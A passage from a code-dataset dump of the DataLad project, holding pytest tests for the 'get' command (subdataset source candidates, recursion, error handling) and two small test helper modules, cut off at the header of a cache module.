dict(path=clone_subpath, parentds=clone.path, gitmodule_url=httpurl)),\n [dict(cost=600, name=DEFAULT_REMOTE, url=httpurl),\n dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n\n # make sure it does meaningful things in an actual clone with an actual\n # record of a subdataset\n clone_subpath = str(clone.pathobj / 'sub')\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n\n # check that a configured remote WITHOUT the desired submodule commit\n # does not show up as a candidate\n clone.siblings('add', name='myremote', url='http://example.com',\n result_renderer='disabled')\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n # inject a source URL config, should alter the result accordingly\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'youredead'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='youredead', from_config=True),\n ])\n # we can alter the cost by given the name a two-digit prefix\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__400BANG': 'youredead'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=400, name='bang', url='youredead', from_config=True),\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n # verify template instantiation works\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'pre-{id}-post'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='pre-{}-post'.format(sub.id),\n from_config=True),\n ])\n # template using the \"regular\" property `path` (`id` above is shortened from\n # actual record `datalad-id` in .gitmodules)\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'somewhe.re/{path}'}):\n eq_(f(clone, 
clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='somewhe.re/sub',\n from_config=True),\n ])\n\n # now again, but have an additional remote besides origin that\n # actually has the relevant commit\n clone3 = install(\n t3, source=t2,\n result_xfm='datasets', return_type='item-or-list')\n clone3.siblings('add', name='myremote', url=ds.path,\n result_renderer='disabled')\n clone3.update(sibling='myremote')\n # we should end up with this additional piece\n # we are not checking for the name of the remote, because it is actually\n # registered under two different names\n assert_in(\n ds_subpath,\n [i['url']\n for i in f(clone3, clone3.subdatasets(return_type='item-or-list'))]\n )\n\n # check #5839: two source configs with the same name should raise an error\n clone3.config.add(\n f\"datalad.get.subdataset-source-candidate-{DEFAULT_REMOTE}\",\n \"should-not-work\"\n )\n clone3.config.add(\n f\"datalad.get.subdataset-source-candidate-{DEFAULT_REMOTE}\",\n \"should-really-not-work\"\n )\n assert_raises(ValueError, clone3.get, 'sub')\n\n # smoke test to check for #5631: We shouldn't crash with a KeyError when a\n # template can not be matched. Origin: https://github.com/datalad/datalad/pull/5644/files\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'pre-{not-a-key}-post'}):\n f(clone, clone.subdatasets(return_type='item-or-list'))\n\n # TODO: check that http:// urls for the dataset itself get resolved\n # TODO: many more!!\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(content=\"doesntmatter\")\ndef test_get_invalid_call(path=None, file_outside=None):\n\n # no argument at all:\n assert_raises(InsufficientArgumentsError, get, None)\n assert_raises(InsufficientArgumentsError, get, [])\n # invalid dataset:\n assert_raises(ValueError, get, None, dataset=path, on_failure='ignore')\n\n # have a plain git:\n ds = Dataset(path)\n ds.create(annex=False)\n with open(opj(path, \"some.txt\"), \"w\") as f:\n f.write(\"whatever\")\n ds.save(\"some.txt\", to_git=True, message=\"Initial commit.\")\n\n # make it an annex (remove indicator file that create has placed\n # in the dataset to make it possible):\n (ds.pathobj / '.noannex').unlink()\n AnnexRepo(path, init=True, create=True)\n # call get again on a file in git:\n result = ds.get(\"some.txt\")\n assert_status('notneeded', result)\n\n # invalid source:\n # yoh: but now we would need to add it to annex since clever code first\n # checks what needs to be fetched at all\n create_tree(path, {'annexed.dat': 'some'})\n ds.save(\"annexed.dat\")\n ds.repo.drop(\"annexed.dat\", options=['--force'])\n with assert_raises(RemoteNotAvailableError) as cme:\n ds.get(\"annexed.dat\", source='MysteriousRemote')\n eq_(\"MysteriousRemote\", cme.value.remote)\n\n res = ds.get(\"NotExistingFile.txt\", on_failure='ignore')\n assert_status('impossible', res)\n assert_message(\"path does not exist\", res)\n\n # path outside repo errors as with most other commands:\n res = ds.get(file_outside, on_failure='ignore', result_renderer='default')\n assert_in_results(\n res, status='error',\n message=('path not associated with dataset %s', ds))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_single_file(src=None, path=None):\n ca = dict(result_renderer='disabled')\n test_fname = 'test-annex.dat'\n orig = Dataset(src).create(**ca)\n (orig.pathobj / test_fname).write_text('some')\n orig.save(**ca)\n\n ds = clone(src, path, **ca)\n 
ok_(ds.is_installed())\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n result = ds.get(\"test-annex.dat\", **ca)\n assert_result_count(result, 1)\n assert_status('ok', result)\n eq_(result[0]['path'], opj(ds.path, 'test-annex.dat'))\n annexprops = ds.repo.get_file_annexinfo('test-annex.dat',\n eval_availability=True)\n eq_(result[0]['annexkey'], annexprops['key'])\n ok_(annexprops['has_content'])\n\n\[email protected](\"override\", [False, True])\n@with_tempfile(mkdir=True)\ndef test_get_subdataset_inherit_reckless(path=None, *, override):\n src = Dataset(opj(path, \"a\")).create()\n src_subds = src.create(\"sub\")\n src_subds.create(\"subsub\")\n src.save(recursive=True)\n\n clone = install(opj(path, \"b\"), source=src, reckless=\"auto\",\n result_xfm=\"datasets\", return_type=\"item-or-list\")\n clone_sub = Dataset(clone.pathobj / \"sub\")\n assert_false(clone_sub.is_installed())\n clone_subsub = Dataset(clone.pathobj / \"sub\" / \"subsub\")\n\n clone.get(opj(\"sub\", \"subsub\"), reckless=False if override else None)\n ok_(clone_sub.is_installed())\n ok_(clone_subsub.is_installed())\n\n for sub in [clone_sub, clone_subsub]:\n eq_(sub.config.get(\"datalad.clone.reckless\", None),\n None if override else \"auto\")\n eq_(sub.config.get(\"annex.hardlink\", None),\n None if override else \"true\")\n\n\n@with_tree(tree={'file1.txt': 'whatever 1',\n 'file2.txt': 'whatever 2',\n 'file3.txt': 'whatever 3',\n 'file4.txt': 'whatever 4'})\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_get_multiple_files(path=None, url=None, ds_dir=None):\n from os import listdir\n\n from datalad.support.network import RI\n\n file_list = [f for f in listdir(path) if not f.startswith('.')]\n\n # prepare urls:\n [RI(url + f) for f in file_list]\n\n # prepare origin\n origin = Dataset(path).create(force=True)\n origin.save(file_list, message=\"initial\")\n\n ds = install(\n ds_dir, source=path,\n result_xfm='datasets', return_type='item-or-list')\n\n # no content present:\n ok_(not any(ds.repo.file_has_content(file_list)))\n\n # get two plus an invalid one:\n result = ds.get(['file1.txt', 'file2.txt', 'not_existing.txt'],\n on_failure='ignore')\n assert_status('impossible', [result[0]])\n assert_status(['ok', 'notneeded'], result[1:])\n # explicitly given not existing file was skipped:\n # (see test_get_invalid_call)\n eq_(set([basename(item.get('path')) for item in result[1:]]),\n {'file1.txt', 'file2.txt'})\n ok_(all(ds.repo.file_has_content(['file1.txt', 'file2.txt'])))\n\n # get all of them:\n result = ds.get(curdir)\n # there were two files left to get:\n eq_(set([basename(item.get('path')) for item in result if item['type'] == 'file']),\n {'file3.txt', 'file4.txt'})\n ok_(all(ds.repo.file_has_content(file_list)))\n\n\n@with_tree(tree={'file1.txt': 'something',\n 'subdir': {'file2.txt': 'something else',\n 'subsubdir': {\n 'file3.txt': 'something completely different',\n 'file4.txt': 'something'\n }}})\n@with_tempfile(mkdir=True)\ndef test_get_recurse_dirs(o_path=None, c_path=None):\n\n # prepare source:\n origin = Dataset(o_path).create(force=True)\n origin.save()\n\n ds = install(\n c_path, source=o_path,\n result_xfm='datasets', return_type='item-or-list')\n\n file_list = ['file1.txt',\n opj('subdir', 'file2.txt'),\n opj('subdir', 'subsubdir', 'file3.txt'),\n opj('subdir', 'subsubdir', 'file4.txt')]\n files_in_sub = [f for f in file_list if f.startswith(with_pathsep('subdir'))]\n\n # no content present:\n ok_(not any(ds.repo.file_has_content(file_list)))\n\n result = ds.get('subdir')\n 
# check result:\n assert_status('ok', result)\n eq_(set([item.get('path')[len(ds.path) + 1:] for item in result\n if item['type'] == 'file']),\n set(files_in_sub))\n # we also get one report on the subdir\n eq_(len(result) - 1, len(files_in_sub))\n\n # got all files beneath subdir:\n ok_(all(ds.repo.file_has_content(files_in_sub)))\n\n # additionally got file1.txt silently, since it has the same content as\n # subdir/subsubdir/file4.txt:\n ok_(ds.repo.file_has_content('file1.txt') is True)\n\n\n@slow # 15.1496s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_recurse_subdatasets(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = clone(\n src, path,\n result_xfm='datasets', return_type='item-or-list')\n\n # ask for the two subdatasets specifically. This will obtain them,\n # but not any content of any files in them\n subds1, subds2 = ds.get(['subm 1', '2'], get_data=False,\n description=\"youcouldnotmakethisup\",\n result_xfm='datasets')\n for d in (subds1, subds2):\n eq_(d.repo.get_description(), 'youcouldnotmakethisup')\n\n # there are 3 files to get: test-annex.dat within each dataset:\n rel_path_sub1 = opj(basename(subds1.path), 'test-annex.dat')\n rel_path_sub2 = opj(basename(subds2.path), 'test-annex.dat')\n annexed_files = {'test-annex.dat',\n rel_path_sub1,\n rel_path_sub2}\n\n # None of them is currently present:\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n assert_repo_status(subds1.path)\n # explicitly given path in subdataset => implicit recursion:\n # MIH: Nope, we fulfill the dataset handle, but that doesn't\n # imply fulfilling all file handles\n result = ds.get(rel_path_sub1, recursive=True)\n # the subdataset was already present\n assert_in_results(\n result,\n type='dataset',\n path=subds1.path,\n status='notneeded')\n # we got the file\n assert_in_results(\n result,\n path=opj(ds.path, rel_path_sub1),\n status='ok')\n\n assert_in_results(result, path=opj(ds.path, rel_path_sub1), status='ok')\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n\n # drop it:\n subds1.repo.drop('test-annex.dat')\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n\n # now, with a path not explicitly pointing within a\n # subdataset, but recursive option:\n # get everything:\n result = ds.get(recursive=True, result_filter=lambda x: x.get('type') != 'dataset')\n assert_status('ok', result)\n\n eq_(set([item.get('path')[len(ds.path) + 1:] for item in result\n if item['type'] == 'file']),\n annexed_files)\n ok_(ds.repo.file_has_content('test-annex.dat') is True)\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n ok_(subds2.repo.file_has_content('test-annex.dat') is True)\n\n # drop them:\n ds.repo.drop('test-annex.dat')\n subds1.repo.drop('test-annex.dat')\n subds2.repo.drop('test-annex.dat')\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n # now, the very same call, but without recursive:\n result = ds.get('.', recursive=False)\n assert_status('ok', result)\n # no duplicate reporting on subdataset install and annex-get of its\n # directory\n eq_(len(result), 1)\n assert_result_count(\n result, 1, path=opj(ds.path, 'test-annex.dat'), status='ok')\n ok_(ds.repo.file_has_content('test-annex.dat') is True)\n 
ok_(subds1.repo.file_has_content('test-annex.dat') is False)\n ok_(subds2.repo.file_has_content('test-annex.dat') is False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_greedy_recurse_subdatasets(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n\n # GIMME EVERYTHING\n ds.get(['subm 1', '2'])\n\n # We got all content in the subdatasets\n subds1, subds2 = ds.subdatasets(result_xfm='datasets')\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n ok_(subds1.repo.file_has_content('test-annex.dat') is True)\n ok_(subds2.repo.file_has_content('test-annex.dat') is True)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_install_missing_subdataset(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = install(\n path=path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n ds.create(force=True) # force, to cause dataset initialization\n subs = ds.subdatasets(result_xfm='datasets')\n ok_(all([not sub.is_installed() for sub in subs]))\n\n # we don't install anything, if no explicitly given path points into a\n # not yet installed subdataset:\n ds.get(curdir)\n ok_(all([not sub.is_installed() for sub in subs]))\n\n # but we do, whenever a given path is contained in such a subdataset:\n file_ = opj(subs[0].path, 'test-annex.dat')\n ds.get(file_)\n ok_(subs[0].is_installed())\n ok_(subs[0].repo.file_has_content('test-annex.dat') is True)\n\n # but we fulfill any handles, and dataset handles too\n ds.get(curdir, recursive=True)\n ok_(all([sub.is_installed() for sub in subs]))\n\n\n@slow # 13.4610s\n# @with_tree(tree={'file_in_git.txt': 'no idea',\n# 'subds': {'file_in_annex.txt': 'content'}})\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_mixed_hierarchy(src=None, path=None):\n\n origin = Dataset(src).create(annex=False)\n origin_sub = origin.create('subds')\n with open(opj(origin.path, 'file_in_git.txt'), \"w\") as f:\n f.write('no idea')\n with open(opj(origin_sub.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content')\n origin.save('file_in_git.txt', to_git=True)\n origin_sub.save('file_in_annex.txt')\n origin.save()\n\n # now, install that thing:\n ds, subds = install(\n path, source=src, recursive=True,\n result_xfm='datasets', return_type='item-or-list', result_filter=None)\n ok_(subds.repo.file_has_content(\"file_in_annex.txt\") is False)\n\n # and get:\n result = ds.get(curdir, recursive=True)\n # git repo and subds\n assert_status(['ok', 'notneeded'], result)\n assert_result_count(\n result, 1, path=opj(subds.path, \"file_in_annex.txt\"), status='ok')\n ok_(subds.repo.file_has_content(\"file_in_annex.txt\") is True)\n\n\n@slow # 20 sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_autoresolve_recurse_subdatasets(src=None, path=None):\n\n origin = Dataset(src).create()\n origin_sub = origin.create('sub')\n origin_subsub = origin_sub.create('subsub')\n with open(opj(origin_subsub.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content')\n origin.save(recursive=True)\n\n ds = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n eq_(len(ds.subdatasets(state='present')), 0)\n\n with chpwd(ds.path):\n results = get(opj(ds.path, 'sub'), recursive=True, result_xfm='datasets')\n eq_(len(ds.subdatasets(state='present', recursive=True)), 2)\n subsub = Dataset(opj(ds.path, 'sub', 
'subsub'))\n ok_(subsub.is_installed())\n assert_in(subsub, results)\n # all file handles are fulfilled by default\n ok_(Dataset(opj(ds.path, 'sub', 'subsub')).repo.file_has_content(\n \"file_in_annex.txt\") is True)\n\n\n@slow # 92sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_recurse_existing(src=None, path=None):\n origin_ds = _make_dataset_hierarchy(src)\n\n # make sure recursion_limit works as expected across a range of depths\n for depth in range(len(origin_ds)):\n res = install(\n path, source=src, recursive=True, recursion_limit=depth,\n result_xfm=None, return_type='list', result_filter=None)\n # we expect one dataset per level\n assert_result_count(\n res, depth + 1, type='dataset', status='ok')\n rmtree(path)\n\n # now install all but the last two levels, no data\n root, sub1, sub2 = install(\n path, source=src, recursive=True, recursion_limit=2,\n result_xfm='datasets', result_filter=None)\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is False)\n sub3 = Dataset(opj(sub2.path, 'sub3'))\n ok_(not sub3.is_installed())\n # now get all content in all existing datasets, no new datasets installed\n # in the process\n files = root.get(curdir, recursive=True, recursion_limit='existing')\n assert_not_in_results(files, type='dataset', status='ok')\n assert_result_count(files, 1, type='file', status='ok')\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is True)\n ok_(not sub3.is_installed())\n # now pull down all remaining datasets, no data\n sub3, sub4 = root.get(\n curdir, recursive=True, get_data=False,\n result_xfm='datasets', result_filter=lambda x: x['status'] == 'ok')\n ok_(sub4.is_installed())\n ok_(sub3.repo.file_has_content('file_in_annex.txt') is False)\n # aaannd all data\n files = root.get(curdir, recursive=True, result_filter=lambda x: x['status'] == 'ok' and x['type'] == 'file')\n eq_(len(files), 1)\n ok_(sub3.repo.file_has_content('file_in_annex.txt') is True)\n\n\n@slow # 33sec\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_in_unavailable_subdataset(src=None, path=None):\n _make_dataset_hierarchy(src)\n root = install(\n path, source=src,\n result_xfm='datasets', return_type='item-or-list')\n targetpath = opj('sub1', 'sub2')\n targetabspath = opj(root.path, targetpath)\n with chpwd(path):\n res = get(targetabspath)\n assert_result_count(res, 2, status='ok', action='install', type='dataset')\n # dry-fit result filter that only returns the result that matched the requested\n # path\n filtered = [r for r in res if only_matching_paths(r, path=targetabspath)]\n assert_result_count(\n filtered, 1, status='ok', action='install', type='dataset',\n path=targetabspath)\n # we got the dataset, and its immediate content, but nothing below\n sub2 = Dataset(targetabspath)\n ok_(sub2.is_installed())\n ok_(sub2.repo.file_has_content('file_in_annex.txt') is True)\n ok_(not Dataset(opj(targetabspath, 'sub3')).is_installed())\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_gh3356(src=None, path=None):\n # create toy version of gh-3356 scenario\n origin = Dataset(src).create()\n origin_sub = origin.create(origin.pathobj / 'subdir'/ 'subds')\n for p in (\n (origin_sub.pathobj / 'data' / 'file_in_annex.txt'),\n (origin_sub.pathobj / 'data' / 'file_in_annex2.txt')):\n p.parent.mkdir(parents=True, exist_ok=True)\n p.write_text(p.name)\n origin.save(recursive=True)\n clone = install(\n path, source=src, result_xfm='datasets', return_type='item-or-list')\n targetpaths = [\n opj('subdir', 'subds', 'data', 
'file_in_annex.txt'),\n opj('subdir', 'subds', 'data', 'file_in_annex2.txt'),\n ]\n with chpwd(path):\n res = get(targetpaths)\n # get() must report success on two files\n assert_result_count(res, 2, action='get', type='file', status='ok')\n # status must report content for two files\n assert_result_count(\n clone.status(recursive=True, annex='all'), 2,\n action='status', has_content=True)\n\n\n# The setup here probably breaks down with adjusted branches.\n@skip_if_adjusted_branch\n@slow # ~12s\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\ndef test_get_subdataset_direct_fetch(path=None):\n path = Path(path)\n origin = Dataset(path / \"origin\").create()\n for sub in [\"s0\", \"s1\"]:\n sds = origin.create(origin.pathobj / sub)\n sds.repo.commit(msg=\"another commit\", options=[\"--allow-empty\"])\n origin.save()\n s0 = Dataset(origin.pathobj / \"s0\")\n s1 = Dataset(origin.pathobj / \"s1\")\n # Abandon the recorded commit so that it needs to be brought down by a\n # direct fetch.\n s0.repo.call_git([\"reset\", \"--hard\", \"HEAD~\"])\n s1.repo.call_git([\"reset\", \"--hard\", \"HEAD~\"])\n\n # Tweak the configuration of s0 to make the direct fetch fail.\n # Disallow direct oid fetch (default).\n s0.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"false\",\n scope=\"local\")\n # Configure the fetcher to avoid v2, which allows fetching unadvertised\n # objects regardless of the value of uploadpack.allowAnySHA1InWant.\n s0.repo.config.set(\"protocol.version\", \"0\", scope=\"local\")\n\n # Configure s1 to succeed with direct fetch.\n s1.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"true\",\n scope=\"local\")\n\n clone = install(\n str(path / \"clone\"),\n source=\"ssh://datalad-test:\" + origin.repo.pathobj.as_posix())\n\n res = clone.get([\"s0\", \"s1\"], on_failure=\"ignore\")\n assert_result_count(res, 1,\n action=\"install\", type=\"dataset\", status=\"error\")\n assert_result_count(res, 1,\n action=\"install\", type=\"dataset\", status=\"ok\")\n\n\n@with_tempfile()\ndef test_get_relays_command_errors(path=None):\n ds = Dataset(path).create()\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n ds.drop(\"foo\", reckless='kill')\n assert_result_count(\n ds.get(\"foo\", on_failure=\"ignore\", result_renderer='disabled'),\n 1, action=\"get\", type=\"file\", status=\"error\")\n\n\n@with_tempfile()\ndef test_missing_path_handling(path=None):\n ds = Dataset(path).create()\n ds.save()\n\n class Struct:\n pass\n\n refds = Struct()\n refds.pathobj = Path(\"foo\")\n refds.subdatasets = []\n refds.path = \"foo\"\n\n with \\\n patch(\"datalad.distribution.get._get_targetpaths\") as get_target_path, \\\n patch(\"datalad.distribution.get.require_dataset\") as require_dataset, \\\n patch(\"datalad.distribution.get._install_targetpath\") as _install_targetpath, \\\n patch(\"datalad.distribution.get.Subdatasets\") as subdatasets:\n\n get_target_path.return_value = [{\n \"status\": \"error\"\n }]\n require_dataset.return_value = refds\n _install_targetpath.return_value = [{\n \"status\": \"notneeded\",\n \"path\": \"foo\",\n \"contains\": \"xxx\"\n }]\n subdatasets.return_value = [{\n \"type\": \"file\",\n \"status\": \"impossible\",\n \"path\": \"foo\",\n \"message\": \"path not contained in any matching subdataset\"}]\n\n # Check for guarded access in error results\n ds.get(\"foo\")\n\n\n@slow # started to >~30sec. 
https://github.com/datalad/datalad/issues/6412\n@known_failure_windows # create-sibling-ria + ORA not fit for windows\n@with_tempfile\n@with_tempfile\n@with_tree(tree={'sub1': {'file1.txt': 'content 1'},\n 'sub2': {'file2.txt': 'content 2'}})\n@with_tempfile\n@with_tempfile\ndef test_source_candidate_subdataset(store1=None, store2=None, intermediate=None,\n super=None, clone=None):\n\n # This tests the scenario of gh-6159.\n # However, the actual point is to test that `get` does not overwrite a\n # source candidate config in subdatasets, if they already have such a\n # config. This could come from any postclone_cfg routine, but the only one\n # actually doing this ATM is postclone_cfg_ria.\n\n ds = Dataset(intermediate).create(force=True)\n ds.create(\"sub1\", force=True)\n ds.create(\"sub2\", force=True)\n ds.save(recursive=True)\n ria_url_1 = \"ria+\" + get_local_file_url(store1, compatibility='git')\n ds.create_sibling_ria(ria_url_1, \"firststore\", recursive=True,\n new_store_ok=True)\n ds.push(\".\", to=\"firststore\", recursive=True)\n superds = Dataset(super).create()\n superds.clone(source=ria_url_1 + \"#\" + ds.id, path=\"intermediate\")\n ria_url_2 = \"ria+\" + get_local_file_url(store2, compatibility='git')\n superds.create_sibling_ria(ria_url_2, \"secondstore\", new_store_ok=True)\n superds.push(\".\", to=\"secondstore\")\n\n cloneds = install(clone, source=ria_url_2 + \"#\" + superds.id)\n\n # This would fail if source candidates weren't right, since cloneds only\n # knows the second store so far (which doesn't have the subdatasets).\n cloneds.get(\"intermediate\", recursive=True)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_non_existing(origin_path=None, clone_path=None):\n\n # test for gh-5537\n _make_dataset_hierarchy(origin_path)\n super_ds = clone(source=origin_path, path=clone_path)\n res = super_ds.get(opj(\"sub1\", \"sub2\", \"sub3\",\n \"file_in_annex.wrong.extension\"),\n result_renderer=\"disabled\", on_failure='ignore')\n # report failure only once:\n assert_result_count(res, 1, status=\"impossible\",\n message=\"path does not exist\")\n\n # same after intermediates are installed:\n res = super_ds.get(opj(\"sub1\", \"sub2\", \"sub3\",\n \"file_in_annex.wrong.extension\"),\n result_renderer=\"disabled\", on_failure='ignore')\n\n assert_result_count(res, 1, status=\"impossible\",\n message=\"path does not exist\")\n" }, { "alpha_fraction": 0.5890728235244751, "alphanum_fraction": 0.5930463671684265, "avg_line_length": 26.962963104248047, "blob_id": "859164fe4337a6122f55e5612be75535db4ff92e", "content_id": "fc5ecd526bcee5fd9f5204890845e349c25d2ef5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 87, "num_lines": 108, "path": "/datalad/distributed/tests/ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport inspect\nimport os\nfrom functools import wraps\nfrom glob import glob\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n attr,\n create_tree,\n)\nfrom datalad.utils import Path\n\ncommon_init_opts = 
[\"encryption=none\", \"type=external\", \"externaltype=ora\",\n \"autoenable=true\"]\n\nexample_payload = {\n 'one.txt': 'content1',\n 'subdir': {\n 'two': 'content2',\n },\n}\n\n\nexample_payload2 = {\n 'three.txt': 'content3',\n 'subdir': {\n 'four': 'content4',\n },\n}\n\n\ndef get_all_files(path):\n return sorted([\n Path(p).relative_to(path)\n for p in glob(str(Path(path) / '**'), recursive=True)\n if not Path(p).is_dir()\n ])\n\n\ndef initremote(repo, name, encryption=None, config=None):\n cfg = dict(config) if config else {}\n cfg['encryption'] = encryption if encryption else 'none'\n args = ['{}={}'.format(k, v) for k, v in cfg.items()]\n repo.init_remote(name, args)\n\n\ndef initexternalremote(repo, name, type, encryption=None, config=None):\n config = dict(\n config if config else {},\n type='external',\n externaltype=type,\n )\n return initremote(repo, name, encryption=encryption, config=config)\n\n\ndef setup_archive_remote(repo, archive_path):\n\n # for integration in a URL, we need POSIX version of the path\n archive_path = Path(archive_path)\n\n if 'DATALAD_TESTS_SSH' in os.environ:\n cfg = {'url': 'ria+ssh://datalad-test{}'\n ''.format(archive_path.as_posix())}\n else:\n cfg = {'url': 'ria+{}'.format(archive_path.as_uri())}\n initexternalremote(repo, 'archive', 'ora', config=cfg)\n\n\ndef populate_dataset(ds):\n # create 2 commits\n for pl in [example_payload, example_payload2]:\n create_tree(ds.path, pl)\n ds.save()\n\n\ndef check_not_generatorfunction(func):\n \"\"\"Internal helper to verify that we are not decorating generator tests\"\"\"\n if inspect.isgeneratorfunction(func):\n raise RuntimeError(\"{}: must not be decorated, is a generator test\"\n .format(func.__name__))\n\n\ndef skip_non_ssh(func):\n \"\"\"Skips non-SSH-based tests if environment variable DATALAD_TESTS_SSH was\n set\n\n This is for test alternatives in order to blow runtime of SSH testing with\n tests that ran in other test builds.\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n @attr('skip_ssh')\n def _wrap_skip_non_ssh(*args, **kwargs):\n if 'DATALAD_TESTS_SSH' in os.environ:\n raise SkipTest(\"Disabled, since DATALAD_TESTS_SSH is set\")\n return func(*args, **kwargs)\n return _wrap_skip_non_ssh\n" }, { "alpha_fraction": 0.608555257320404, "alphanum_fraction": 0.6125907897949219, "avg_line_length": 43.25, "blob_id": "fb2957e64bda138de93541e5dcd87a572d148f1f", "content_id": "43d4a1a057ebde1b9afa0db72c9ac29acda82228", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "permissive", "max_line_length": 100, "num_lines": 28, "path": "/datalad/downloaders/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Downloader tests helper utils\"\"\"\n\nfrom unittest import SkipTest\n\nfrom datalad.downloaders.providers import Providers\n\n\ndef get_test_providers(url=None, reload=False):\n \"\"\"Return reusable instance of our global providers + verify credentials for url\"\"\"\n _test_providers = Providers.from_config_files(reload=reload)\n if url is not None:\n # check if 
we have credentials for the url\n provider = _test_providers.get_provider(url, only_nondefault=True)\n if provider is None or provider.credential is None:\n # no registered provider, or no credential needed,must be all kosher to access\n pass\n elif not provider.credential.is_known:\n raise SkipTest(\"This test requires known credentials for %s\" % provider.credential.name)\n return _test_providers\nget_test_providers.__test__ = False\n" }, { "alpha_fraction": 0.5367775559425354, "alphanum_fraction": 0.553415060043335, "avg_line_length": 33.60606002807617, "blob_id": "7dde2b356cac815f5737a3fe59a36f19c28ea993", "content_id": "387cc703cabcdf010a484c0ecb6c0d4c617cf26d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "permissive", "max_line_length": 87, "num_lines": 33, "path": "/datalad/support/cache.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license 